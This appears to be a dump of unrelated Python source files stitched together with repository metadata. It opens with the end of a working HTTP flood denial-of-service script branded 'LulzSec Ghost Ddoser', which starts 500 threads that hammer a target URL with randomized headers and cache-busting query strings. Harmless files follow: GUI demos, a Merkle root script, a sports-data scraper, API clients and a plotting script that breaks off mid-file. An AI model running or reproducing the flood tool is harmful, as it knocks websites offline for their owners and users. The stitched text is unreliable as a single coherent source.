bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
return(bots)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print 'Pra usar python Lulz.py <url>'
print 'LulzSec Ghost Ddoser By V3I0p3r'
print 'Script Priv8 Privada da LulzSec Ghost'
print "\a"
print \
""" .
_____|\
_.--| LOL |:
<____|.----||
.---''---,
The ;..__..' _...
Lulz ,'/ ;|/..--'' \
Boat ,'_/.-/': :
_..-'''/ / | \ \ _|/|
\ /-./_ \; \ \,;' \
,\ / \: `:\ \ // `:`.
,' \ /-._; | : : :: ,. .
,' :: /`-._| | | || ' : `.`.)
_,' |;._:: | | | | `| : `'
,' `. / |`-:_ ; | | | : \
`--. ) /|-._: : | \ \
/ / :_| ;`-._; __..--'; : :
/ ( ;|;-./_ _/.-:'o | / ' |
/ , \._/_/_./--''/_|:|___|_,' |
: / `'-'--'----'---------' |
| : O ._O O_. O ._O O_. ; ;
: `. // // // // ,' /
~~~`.______//____//____//____//_______,'~
// //~ // //
~~ _// _// _// ~ _// ~
~ / / / / / / / / ~ ~~
~~~ ~~~ ~~~ ~~~
"""
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print '[+]~>LULZ ATTACK STARTRD<~'
print '[+]~~>LULZ ATTACK STARTRD<~~[+] '
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==800) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+500<request_counter) & (previous<>request_counter):
print "%d lULZ Up" % (request_counter)
previous=request_counter
if flag==2:
print "\n -lULZ Finish"
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "Script Priv8 Privada da LulzSec Ghost"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
| 1.304688 | 1 |
build/lib/abp/adaptives/a3c/__init__.py | LinearZoetrope/abp | 0 | 12797472 | <reponame>LinearZoetrope/abp<filename>build/lib/abp/adaptives/a3c/__init__.py
from .adaptive import A2CAdaptive
| 0.285156 | 0 |
bglib/kvui/rootwidget.py | dheller1/bglib | 0 | 12797480 | <gh_stars>0
from kivy.uix.widget import Widget
from kivy.uix.floatlayout import FloatLayout
class RootWidget(FloatLayout):
def __init__(self, **kwargs):
super().__init__(**kwargs)
| 1.320313 | 1 |
pyqt_demo/test1.py | yzwxx/Label_Lab | 0 | 12797488 | <reponame>yzwxx/Label_Lab<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
a window with menu bar and tool bar
QAction with addAction for event handling(setting hot keys,showing status tip)
set window icon
'''
import os
from os.path import join
import sys
from PyQt4 import QtGui,QtCore
icon_path = join(os.getcwd(),'icon.png')
class Example1(QtGui.QMainWindow):
def __init__(self):
super(Example1, self).__init__()
self.initUI()
def initUI(self):
# text edit
textEdit = QtGui.QTextEdit()
self.setCentralWidget(textEdit)
# menubar's action
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(QtGui.QApplication.quit)
self.statusBar().showMessage('Ready')
# menubar
menubar = self.menuBar()
menubar.setNativeMenuBar(False)
fileMenu = menubar.addMenu('&File')
fileMenu.addAction(exitAction) # binding the action to the menu in menubar
# toolbar
self.toolbar = QtGui.QToolBar('name')
self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.toolbar.addAction(exitAction)
self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar)
self.toolbar2 = QtGui.QToolBar('name')
self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.toolbar2.addAction(exitAction)
self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2)
self.setGeometry(500, 300, 550, 350) # set location of app windows on screen and its size
self.setWindowTitle('GUI Demo')
# window icon
self.setWindowIcon(QtGui.QIcon(icon_path))
# tooltip
# QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10))
# self.setToolTip('This is a <b>QWidget</b> widget')
# create buttons
btn = QtGui.QPushButton('Button', self)
# btn.setToolTip('This is a <b>QPushButton</b> widget')
btn.resize(btn.sizeHint())
btn.move(0, 300)
qbtn = QtGui.QPushButton('Quit', self)
qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit)
qbtn.resize(qbtn.sizeHint())
qbtn.move(100, 300)
# status bar
# self.statusBar().showMessage('Ready')
# self.statusBar().showMessage('not Ready')
# center the window on screen
self.center()
self.show()
def closeEvent(self, event):
reply = QtGui.QMessageBox.question(self, 'Message',
"Are you sure to quit?", QtGui.QMessageBox.Yes |
QtGui.QMessageBox.No, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
event.accept()
else:
event.ignore()
def center(self):
qr = self.frameGeometry()
cp = QtGui.QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def main():
app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object
#print sys.argv[1:]
ex = Example1()
sys.exit(app.exec_()) # The event handling starts from this point
if __name__ == '__main__':
main() | 2.046875 | 2 |
merkle.py | makiolo/root_merkle_tree | 2 | 12797496 | <filename>merkle.py<gh_stars>1-10
'''
Generate root merkle tree hash in python.
I use https://github.com/bitcoin/bitcoin as reference:
BlockBuildMerkleTree --> Satoshi implmentation
BlockMerkleRoot ---> new bitcoin core implementation
'''
import pandas as pd
from hashlib import sha256
from io import StringIO
# h( h(1) + h(2) )
# 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8
# h( h(3) + h(4) )
# b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2
# h( h( h(1) + h(2) ) + h( h(3) + h(4) ) )
# 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766
dataset = StringIO("""\
transaction1_serialized_A_B_3
transaction2_serialized_B_C_1
transaction3_serialized_D_E_2
transaction4_serialized_E_B_1
transaction5_serialized_C_B_2
transaction6_serialized_D_A_1
""")
df = pd.read_csv(dataset, encoding='utf-8', header=None)
hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist()
while len(hashes) > 1:
if len(hashes) % 2 != 0:
hashes.append(hashes[-1])
i = 0
j = 0
while i + 1 < len(hashes):
hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest()
i += 2
j += 1
hashes = hashes[:int(len(hashes) / 2)]
# tree condensed in a hash
print(hashes[0])
| 1.898438 | 2 |
nfl/espn.py | sansbacon/nfl | 2 | 12797504 | """
# espn.py
# classes for scraping, parsing espn football data
# this does include some basic fantasy data
# espn_fantasy is mostly about managing fantasy teams
# NOTE: trouble accessing data in offseason
# will have to revisit this module as season approaches
"""
import logging
import re
from bs4 import BeautifulSoup, NavigableString, Tag
from namematcher.xref import Site
from sportscraper.scraper import RequestScraper
FANTASY_TEAMS = {
1: "Atl",
2: "Buf",
3: "Chi",
4: "Cin",
5: "Cle",
6: "Dal",
7: "Den",
8: "Det",
9: "GB",
10: "Ten",
11: "Ind",
12: "KC",
13: "Oak",
14: "LAR",
15: "Mia",
16: "Min",
17: "NE",
18: "NO",
19: "NYG",
20: "NYJ",
21: "Phi",
22: "Ari",
23: "Pit",
24: "LAC",
25: "SF",
26: "Sea",
27: "TB",
28: "Wsh",
29: "Car",
30: "Jax",
33: "Bal",
34: "Hou",
}
class Scraper(RequestScraper):
"""
Scrape ESPN.com for football stats
"""
@staticmethod
def _check_pos(pos):
"""
Makes sure pos is valid and uppercase
Args:
pos(str):
Returns:
str
"""
if pos in [
"qb",
"rb",
"wr",
"te",
"dst",
"d/st",
"k",
"QB",
"RB",
"WR",
"TE",
"K",
"D/ST",
"DST",
]:
if pos in ["DST", "dst"]:
pos = "D/ST"
return pos.upper()
else:
raise ValueError("invalid position: {}".format(pos))
def adp(self, season_year):
"""
Gets adp data
Args:
season_year(int): 2019, etc.
Returns:
dict: parsed JSON
"""
url = (
f"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/"
f"segments/0/leaguedefaults/1?view=kona_player_info"
)
return self.get_json(url)
def players_position(self, pos):
"""
Gets page with all players by position
Args:
pos(str): qb, rb, wr, te, k, etc.
Returns:
str
"""
url = "http://www.espn.com/nfl/players?position={}&league=nfl"
return self.get(url.format(pos), encoding="latin1")
def projections(self, pos, season_year=None, week=0, offset=0):
"""
Gets page with projections by position
Args:
pos: str qb, rb, wr, te, k, etc.
season_year: int 2017, 2016
week: int 1, 2, 3
offset: int 0, 40, 80, etc.
Returns:
HTML string
TODO: revise based on new URL
"""
pos = pos.lower()
slot_categories = {"qb": 0, "rb": 2, "wr": 4, "te": 6, "dst": 16, "k": 17}
max_offset = {"qb": 120, "rb": 240, "wr": 360, "te": 160, "dst": 0, "k": 40}
if pos not in slot_categories.keys():
raise ValueError("invalid pos {}".format(pos))
if offset > max_offset.get(pos):
raise ValueError("invalid offset {}".format(offset))
if offset % 40 > 0:
raise ValueError("invalid offset {}".format(offset))
# https://fantasy.espn.com/football/players/projections
url = "http://games.espn.com/ffl/tools/projections?"
if season_year:
params = {
"slotCategoryId": slot_categories[pos],
"startIndex": offset,
"seasonId": season_year,
}
else:
params = {"slotCategoryId": slot_categories[pos], "startIndex": offset}
if week:
params["scoringPeriodId"] = week
else:
params["seasonTotals"] = "true"
return self.get(url, params=params, encoding="latin1")
def team_roster(self, team_code):
"""
Gets list of NFL players from ESPN.com
Args:
team_code: str 'DEN', 'BUF', etc.
Returns:
HTML string
"""
url = f"http://www.espn.com/nfl/team/roster/_/name/{team_code}"
return self.get(url, encoding="latin1")
def weekly_scoring(self, season_year, week, position):
"""
Gets weekly fantasy scoring page
Args:
season_year (int): 2017, 2016, etc.
week (int): 1 through 17
position (str): 'qb', 'wr', etc.
Returns:
str: HTML
TODO: rework for new URL
"""
poscode = {"qb": 0, "rb": 2, "wr": 4, "te": 6, "dst": 16, "k": 17}
if position.lower() not in poscode:
raise ValueError("invalid position: {}".format(position))
# https://fantasy.espn.com/football/leaders
url = "http://games.espn.com/ffl/leaders?&"
params = {
"scoringPeriodId": week,
"seasonId": season_year,
"slotCategoryId": position,
}
return self.get(url, params=params)
class Parser:
"""
Parse ESPN.com for football stats
"""
def __init__(self):
"""
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
@staticmethod
def _val(val):
"""
Converts non-numeric value to numeric 0
Args:
val:
Returns:
number
"""
if "--" in val:
return 0
return val
@staticmethod
def adp(content):
"""
Parses season-long ADP
Args:
content:
Returns:
list of dict
"""
vals = []
for item in content["players"]:
tl_wanted = [
"defaultPositionId",
"firstName",
"id",
"lastName",
"proTeamId",
]
api_player = {k: v for k, v in item["player"].items() if k in tl_wanted}
for scoring_type in ["PPR", "STANDARD"]:
for rank_type in ["rank", "auctionValue"]:
key = scoring_type.lower() + "_" + rank_type
try:
api_player[key] = item["player"]["draftRanksByRankType"][
scoring_type
][rank_type]
except KeyError:
api_player[key] = None
vals.append(api_player)
return vals
def projections(self, content, pos):
"""
Parses ESPN fantasy football season-long sortable projections page
Args:
content: HTML string
Returns:
list of dict
"""
players = []
soup = BeautifulSoup(content, "lxml")
if pos.lower() in ["qb", "rb", "wr", "te", "flex"]:
headers = [
"pass_att",
"pass_cmp",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec",
"rec_yds",
"rec_td",
"fantasy_points_ppr",
]
for row in soup.findAll("tr", {"class": "pncPlayerRow"}):
player = {"source": "espn"}
tds = row.find_all("td")
# tds[0]: rank
player["source_position_rank"] = tds[0].text
# tds[1]: name/team/pos
link, navstr = list(tds[1].children)[0:2]
player["source_player_name"] = link.text
player["source_player_team"], player[
"source_player_position"
] = navstr.split()[-2:]
player["source_player_id"] = link.attrs.get("playerid")
# loop through stats
# they have attempts/completions in one column so have to remove & split
vals = [self._val(td.text) for td in tds[3:]]
for header, val in zip(headers, tds[2].text.split("/") + vals):
player[header] = val
players.append(player)
elif pos.lower() == "k":
for row in soup.findAll("tr", {"class": "pncPlayerRow"}):
player = {"source": "espn"}
tds = row.find_all("td")
# tds[0]: rank
player["source_position_rank"] = tds[0].text
# tds[1]: name/team/pos
link, navstr = list(tds[1].children)[0:2]
player["source_player_name"] = link.text
player["source_player_team"], player[
"source_player_position"
] = navstr.split()[-2:]
player["source_player_id"] = link.attrs.get("playerid")
# loop through stats
# they have attempts/completions in one column so have to remove & split
player["fantasy_points_ppr"] = self._val(tds[-1].text)
players.append(player)
else:
pass
return players
@staticmethod
def players_position(content, pos):
"""
Parses page of ESPN players by position
Args:
content:
pos:
Returns:
list: of dict
"""
players = []
soup = BeautifulSoup(content, "lxml")
for row in soup.find_all("tr"):
class_matches = set(["oddrow", "evenrow"])
classes = set(row.attrs.get("class", []))
if class_matches.intersection(classes):
player = {"source": "espn", "source_player_position": pos}
tds = row.find_all("td")
# tds[0]: <a href="http://www.espn.com/nfl/player/_/id/
# 2574511/brandon-allen"><NAME></a>
player["source_player_name"] = tds[0].text
link = row.find("a", {"href": re.compile(r"/player/_/")})
if link:
match = re.search(r"\/id\/([0-9]+)", link["href"])
if match:
player["source_player_id"] = match.group(1)
# tds[1]: <td><a href="http://www.espn.com/nfl/team/_/
# name/jax/jacksonville-jaguars"><NAME></a></td>
player["source_team_name"] = tds[1].text
link = row.find("a", {"href": re.compile(r"/team/_/name")})
if link:
match = re.search(r"name/(\w+)/", link["href"])
if match:
player["source_team_code"] = match.group(1)
# tds[2]: <td>Arkansas</td>
player["college"] = tds[2].text
# add to list
players.append(player)
return players
@staticmethod
def team_roster(content):
"""
Parses team roster page into list of player dict
Args:
content: HTML of espn nfl team roster page
Returns:
list of dict
"""
players = []
soup = BeautifulSoup(content, "lxml")
for row in soup.find_all("tr"):
link = row.find("a", {"href": re.compile(r"/nfl/player/_/id/")})
try:
player = {"source": "espn"}
tds = row.find_all("td")
if len(tds) != 8:
continue
player["source_player_position"] = tds[2].text
player["source_player_name"] = link.text
player["source_player_id"] = link["href"].split("/")[-2]
players.append(player)
except ValueError:
pass
return players
@staticmethod
def weekly_scoring(content):
"""
Parses weekly scoring page
Args:
content (str): HTML
Returns:
list: of dict
"""
results = []
headers = [
"c_a",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec_rec",
"rec_yds",
"rec_td",
"rec_tar",
"tpc",
"fumble",
"misc_td",
"fpts",
]
soup = BeautifulSoup(content, "lxml")
tbl = soup.select("table#playertable_0")[0]
for row in tbl.find_all("tr", {"id": re.compile(r"plyr")}):
tds = [td.text for td in row.find_all("td", class_="playertableStat")]
if tds:
player = dict(zip(headers, tds))
# name, team, position
nametd = row.find("td", {"id": re.compile(r"playername")})
for child in nametd.children:
if isinstance(child, NavigableString):
player["source_player_team"], player[
"source_player_position"
] = child.string.split()[1:3]
elif isinstance(child, Tag):
player["source_player_name"] = child.string
player["source_player_id"] = child.attrs.get("playerid")
results.append(player)
return results
@staticmethod
def weekly_scoring_dst(content):
"""
Parses weekly scoring page for dst
Args:
content(str): HTML
Returns:
list: of dict
"""
# TODO: adapt for dst
results = []
headers = [
"c_a",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec_rec",
"rec_yds",
"rec_td",
"rec_tar",
"tpc",
"fumble",
"misc_td",
"fpts",
]
soup = BeautifulSoup(content, "lxml")
tbl = soup.select("table#playertable_0")[0]
for row in tbl.find_all("tr", {"id": re.compile(r"plyr")}):
tds = [td.text for td in row.find_all("td", class_="playertableStat")]
if tds:
player = dict(zip(headers, tds))
# name, team, position
nametd = row.find("td", {"id": re.compile(r"playername")})
for child in nametd.children:
if isinstance(child, NavigableString):
player["source_player_team"], player[
"source_player_position"
] = child.string.split()[1:3]
elif isinstance(child, Tag):
player["source_player_name"] = child.string
player["source_player_id"] = child.attrs.get("playerid")
results.append(player)
return results
@staticmethod
def weekly_scoring_k(content):
"""
Parses weekly scoring page for kickers
Args:
content (str): HTML
Returns:
list: of dict
"""
# TODO: adapt for kicker
results = []
headers = [
"c_a",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec_rec",
"rec_yds",
"rec_td",
"rec_tar",
"tpc",
"fumble",
"misc_td",
"fpts",
]
soup = BeautifulSoup(content, "lxml")
tbl = soup.select("table#playertable_0")[0]
for row in tbl.find_all("tr", {"id": re.compile(r"plyr")}):
tds = [td.text for td in row.find_all("td", class_="playertableStat")]
if tds:
player = dict(zip(headers, tds))
# name, team, position
nametd = row.find("td", {"id": re.compile(r"playername")})
for child in nametd.children:
if isinstance(child, NavigableString):
player["source_player_team"], player[
"source_player_position"
] = child.string.split()[1:3]
elif isinstance(child, Tag):
player["source_player_name"] = child.string
player["source_player_id"] = child.attrs.get("playerid")
results.append(player)
return results
class Agent:
"""
Combines common scraping/parsing tasks
"""
def __init__(self, scraper=None, parser=None, cache_name="espn-agent"):
"""
Creates Agent object
Args:
scraper(espn.Scraper): default None
parser(espn.Parser): default None
cache_name(str): default 'espn-agent'
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
if scraper:
self._s = scraper
else:
self._s = Scraper(cache_name=cache_name)
if parser:
self._p = parser
else:
self._p = Parser()
def adp(self, season_year):
"""
Gets season ADP data
Args:
season_year(int): 2018, 2019, etc.
Returns:
list: of dict
"""
content = self._s.adp(season_year)
return self._p.adp(content)
class Xref(Site):
"""
Cross-reference source players with other names/ids
"""
def __init__(self, source_name="espn"):
"""
Args:
source_name(str): either 'espn' or 'espn_fantasy'
"""
super().__init__()
self.source_name = source_name
if __name__ == "__main__":
pass
| 2.15625 | 2 |
common/utils/api_utils.py | hvsuchitra/tv_tracker | 0 | 12797512 | <gh_stars>0
import requests
import requests_cache
# path when running from gui
requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400)
# requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400)
resource_base_url = 'https://thetvdb.com'
api_base_url = 'https://api.thetvdb.com'
resource_base_url_per_ep = 'https://thetvdb.com/banners/'
headers = {}
def get_jwt():
data = {'apikey': 'api_key', 'username': 'username',
'userkey': 'user_key'}
with requests_cache.disabled():
response = requests.post(f'{api_base_url}/login', json=data)
if response.status_code == 200:
global headers
jwt = response.json()['token']
headers['Authorization'] = f'Bearer {jwt}'
return jwt
def search_show(show_name):
shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json()
cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired')
if shows.get('Error'): return None
yield from (
dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available' for col in cols_needed)))
for
show in shows['data'])
def get_image(url):
return requests.get(resource_base_url + url, headers=headers).content
def get_episode_count(show_id):
url = f'{api_base_url}/series/{show_id}/episodes/summary'
response_json = requests.get(url, headers=headers).json()
season_list, episode_count, *_ = response_json['data'].values()
return season_list, int(episode_count)
def get_image_per_ep(url):
return requests.get(resource_base_url_per_ep + url, headers=headers).content
get_jwt()
| 1.265625 | 1 |
tests/r/test_rep_vict.py | hajime9652/observations | 199 | 12797520 | <filename>tests/r/test_rep_vict.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.rep_vict import rep_vict
def test_rep_vict():
"""Test module rep_vict.py by downloading
rep_vict.csv and testing shape of
extracted data has 8 rows and 8 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = rep_vict(test_path)
try:
assert x_train.shape == (8, 8)
except:
shutil.rmtree(test_path)
raise()
| 1.242188 | 1 |
python/hello-python.py | bobby-web/programlang | 0 | 12797528 | print("Hllo World") | -0.235352 | 0 |
app/api/index.py | awtkns/openapi-perf-action | 0 | 12797536 | import os
from fastapi import FastAPI, HTTPException
from github3.exceptions import NotFoundError, ForbiddenError
from github3.github import GitHub
from github3.pulls import PullRequest
from pydantic import BaseModel
GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None)
GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None)
if not GITHUB_PRIVATE_KEY:
GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read()
app = FastAPI()
class ActionIn(BaseModel):
content: str
owner: str
repository: str
pr_number: int
@property
def repo(self) -> str:
return f'{self.owner}/{self.repository}'
@app.post('/comment')
def comment_on_pr(action: ActionIn):
gh = login_as_installation(action)
get_pr(gh, action).create_comment(action.content)
return "Post Success", 200
@app.post('/reaction')
def react_to_pr(action: ActionIn):
gh = login_as_installation(action)
issue = get_pr(gh, action).issue()
issue._post(
issue._api + '/reactions',
data={"content": action.content},
headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'}
)
return "Post Success", 200
def login_as_installation(action: ActionIn):
try:
gh = GitHub()
gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER)
install = gh.app_installation_for_repository(action.owner, action.repository)
gh.login_as_app_installation(
GITHUB_PRIVATE_KEY.encode(),
GITHUB_APP_IDENTIFIER,
install.id
)
return gh
except NotFoundError:
raise HTTPException(404, f"OpeAPI Perf App not installed to {action.repo}")
def get_pr(gh, action: ActionIn) -> PullRequest:
try:
return gh.pull_request(
owner=action.owner,
repository=action.repository,
number=action.pr_number
)
except ForbiddenError:
raise HTTPException(403, f"Application not setup for the repository {action.repo}")
except NotFoundError:
raise HTTPException(404, f"PR #{action.pr_number} does not exist in {action.repo}")
| 1.40625 | 1 |
scripts/plot_performance.py | shercklo/LTO-CMA | 7 | 12797544 | <reponame>shercklo/LTO-CMA
import os
import json
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import argparse
from datetime import datetime
sns.set()
from matplotlib import rcParams
rcParams["font.size"] = "40"
rcParams['text.usetex'] = False
rcParams['font.family'] = 'serif'
rcParams['figure.figsize'] = (16.0, 9.0)
rcParams['figure.frameon'] = True
rcParams['figure.edgecolor'] = 'k'
rcParams['grid.color'] = 'k'
rcParams['grid.linestyle'] = ':'
rcParams['grid.linewidth'] = 0.5
rcParams['axes.linewidth'] = 3
rcParams['axes.edgecolor'] = 'k'
rcParams['axes.grid.which'] = 'both'
rcParams['legend.frameon'] = 'True'
rcParams['legend.framealpha'] = 1
rcParams['legend.fontsize'] = 30
rcParams['ytick.major.size'] = 32
rcParams['ytick.major.width'] = 6
rcParams['ytick.minor.size'] = 6
rcParams['ytick.minor.width'] = 1
rcParams['xtick.major.size'] = 32
rcParams['xtick.major.width'] = 6
rcParams['xtick.minor.size'] = 6
rcParams['xtick.minor.width'] = 1
rcParams['xtick.labelsize'] = 32
rcParams['ytick.labelsize'] = 32
def dir_path(path):
if os.path.isfile(path):
return path
else:
raise argparse.ArgumentTypeError("readable_dir:%s is not a valid path to a file"% path)
parser = argparse.ArgumentParser(description='Script to plot LTO test data.')
parser.add_argument('--lto_path', type=dir_path, help="Path to the LTO data file.",
default=os.path.join("..","examples","10BBOB","GallaghersGaussian21hi_LTO.json"))
parser.add_argument('--csa_path', type=dir_path, help="Path to the CSA data file.",
default=os.path.join("..","data","PPSN_LTO_Data","CSA_Data","CSA_Plots_10D","GallaghersGaussian21hi.json"))
parser.add_argument('--function', type=str, help="Function being plotted",
default="GallaghersGaussian21hi")
args = parser.parse_args()
lto_path = args.lto_path
csa_path = args.csa_path
function = args.function
popsize = 10
data_LTO = {}
data_CSA = {}
with open(lto_path) as json_file:
data_LTO = json.load(json_file)
with open(csa_path) as json_file:
data_CSA = json.load(json_file)
generations = len(data_LTO["Average costs LTO"])
num_feval = generations * popsize
plt.tick_params(axis='x', which='minor')
plt.legend(loc=0, fontsize=25, ncol=2)
plt.xlabel("Num FEval", fontsize=50)
plt.ylabel("Step Size", fontsize=50)
plt.xticks(np.arange(start=1, stop=generations, step=generations//5),
[str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)])
plt.xticks()
plt.title(function)
plt.fill_between(list(np.arange(1, len(data_LTO["Sigma LTO"]) + 1)),
np.subtract(data_LTO["Sigma LTO"], data_LTO["Std Sigma LTO"]),
np.add(data_LTO["Sigma LTO"], data_LTO["Std Sigma LTO"]),
color=sns.xkcd_rgb["magenta"], alpha=0.1)
plt.plot(list(np.arange(1, len(data_LTO["Sigma LTO"]) + 1)), data_LTO["Sigma LTO"], linewidth=4,
label="LTO", color=sns.xkcd_rgb["magenta"])
plt.fill_between(list(np.arange(1, len(data_CSA["Sigma CSA"]) + 1)),
np.subtract(data_CSA["Sigma CSA"], data_CSA["Std Sigma CSA"]),
np.add(data_CSA["Sigma CSA"], data_CSA["Std Sigma CSA"]),
color=sns.xkcd_rgb["green"], alpha=0.1)
plt.plot(list(np.arange(1, len(data_CSA["Sigma CSA"]) + 1)), data_CSA["Sigma CSA"], linewidth=4,
label="CSA", color=sns.xkcd_rgb["green"])
plt.legend()
type = "StepSize"
output_path = os.path.join("..","plots")
os.makedirs(output_path, exist_ok=True)
timestamp = datetime.now()
time = str(timestamp)
plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time))
plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight')
plt.clf()
plt.tick_params(axis='x', which='minor')
plt.legend(loc=0, fontsize=25, ncol=2)
plt.xlabel("Num FEval", fontsize=50)
plt.ylabel("Objective Value", fontsize=50)
plt.xscale("log")
plt.title(function)
plt.xticks(np.arange(start=1, stop=generations, step=generations//5),
[str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)])
plt.fill_between(list(np.arange(1, len(data_LTO["Average costs LTO"]) + 1)),
np.subtract(data_LTO["Average costs LTO"], data_LTO["Std costs LTO"]),
np.add(data_LTO["Average costs LTO"], data_LTO["Std costs LTO"]), alpha=0.1,
color=sns.xkcd_rgb["magenta"])
plt.plot(list(np.arange(1, len(data_LTO["Average costs LTO"]) + 1)), data_LTO["Average costs LTO"],
linewidth=4, label="LTO", color=sns.xkcd_rgb["magenta"])
plt.fill_between(list(np.arange(1, len(data_CSA["Average costs CSA"]) + 1)),
np.subtract(data_CSA["Average costs CSA"], data_CSA["Std costs CSA"]),
np.add(data_CSA["Average costs CSA"], data_CSA["Std costs CSA"]), alpha=0.1,
color=sns.xkcd_rgb["green"])
